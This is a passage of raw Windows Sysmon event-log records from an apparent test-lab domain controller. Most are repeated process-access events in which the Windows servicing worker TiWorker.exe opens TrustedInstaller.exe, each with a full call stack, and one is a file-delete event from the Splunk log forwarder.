2bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.465{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.465{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.449{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.449{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.449{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.449{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.449{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000005984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.449{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DF02AF33DDCE03768D69380C93EDC01,SHA256=AE8F57FA44253482E18AEBB0ED52396B2AC13A0ECEACE2D5C531EC9D77CC14EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.434{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.418{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.402{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.402{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.371{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.371{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.371{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.371{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.371{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.356{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 